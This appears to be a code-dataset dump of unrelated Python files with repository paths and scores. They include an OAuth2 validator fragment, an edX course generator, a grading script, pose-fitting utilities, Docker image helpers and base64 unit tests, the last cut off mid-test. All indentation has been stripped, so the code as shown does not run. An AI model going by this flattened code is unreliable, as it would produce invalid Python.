expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
Check that and Application exists with given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| 2.40625 | 2 |
objects/fun_return.py | padmacho/pythontutorial | 0 | 3359 | def modify(y):
return y # returns same reference. No new object is created
x = [1, 2, 3]
y = modify(x)
print("x == y", x == y)
print("x == y", x is y) | 3.984375 | 4 |
edx_gen/_write_comps.py | hberndl70/mooc-generator | 0 | 3360 | import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| 2.125 | 2 |
grading_program.py | ByeonghoonJeon/Student-Grading | 0 | 3361 | # 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Creat a function that evaluate the validity of name.
def check_name(name):
# 2.1.1 Remove period and blank and check it if the name is comprised with only Alphabet.
# 2.1.1.1 Make a list of spelling in the name.
list_of_spelling = list(name)
# 2.1.1.2 Remove period and blank from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
# 2.1.1.4 Return if the string is Alphabet.
return list_to_string.isalpha()
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
check_name(name)
# 2.3 Check if the name is alphabet. If not, ask to input correct name again.
while check_name(name) != True:
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while score.isdigit() == False or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
| 4.3125 | 4 |
test/test_utils.py | by46/recipe | 0 | 3362 | import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| 3 | 3 |
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py | wangxihao/rgbd-kinect-pose | 1 | 3363 | import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
for i in range(0, pose_body_mats.shape[0]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i])
pose_body[3 * i: 3 * i + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| 2.171875 | 2 |
scripts/dev/dockerutil.py | axelbarjon/mongodb-kubernetes-operator | 1 | 3364 | import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
build_and_push_operator creates the Dockerfile for the operator
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| 2.421875 | 2 |
scripts/VCF/UTILS/select_variants.py | elowy01/igsr_analysis | 3 | 3365 | <gh_stars>1-10
from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
| 2.828125 | 3 |
site/tests/unittests/test/test_base64.py | martinphellwig/brython_wf | 652 | 3366 | <filename>site/tests/unittests/test/test_base64.py
import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
